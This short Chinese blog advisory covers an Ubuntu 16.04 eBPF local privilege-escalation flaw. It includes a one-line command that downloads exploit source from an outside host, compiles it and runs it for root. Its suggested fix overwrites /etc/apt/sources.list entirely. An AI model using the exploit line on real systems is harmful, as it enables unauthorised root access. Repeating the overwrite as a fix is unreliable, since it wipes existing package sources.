【漏洞告警】Ubuntu最新版本存在本地提权漏洞(已有POC)及解决方案

  • A+
所属分类:安全漏洞

根据下班前安全客同学的报道:https://www.anquanke.com/post/id/101243


【漏洞告警】Ubuntu最新版本存在本地提权漏洞(已有POC)及解决方案


PoC:https://t.co/vXPrr33S7B

前提条件:

未设置unprivileged_bpf_disabled sysctl ,非特权用户就可以利用此漏洞。


已知可以测试版本:

ubuntu 16.04.4

ubuntu 16.04.3


在非root机器上可以执行:wget -P /tmp http://cyseclabs.com/exploits/upstream44.c &&cd /tmp && gcc -o pwned  upstream44.c && chmod 777 pwned && ./pwned


【漏洞告警】Ubuntu最新版本存在本地提权漏洞(已有POC)及解决方案



解决方案:

echo "deb http://archive.ubuntu.com/ubuntu/  xenial-proposed restricted main multiverse universe" > /etc/apt/sources.list && apt update && apt install linux-image-4.4.0-117-generic && reboot

【漏洞告警】Ubuntu最新版本存在本地提权漏洞(已有POC)及解决方案


更新内核后需要重新才能生效


【漏洞告警】Ubuntu最新版本存在本地提权漏洞(已有POC)及解决方案

再次执行会提示无权限操作!


【漏洞告警】Ubuntu最新版本存在本地提权漏洞(已有POC)及解决方案

以上小姐姐所述
我司一概不负责

本文始发于微信公众号(逢人斗智斗勇):【漏洞告警】Ubuntu最新版本存在本地提权漏洞(已有POC)及解决方案

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: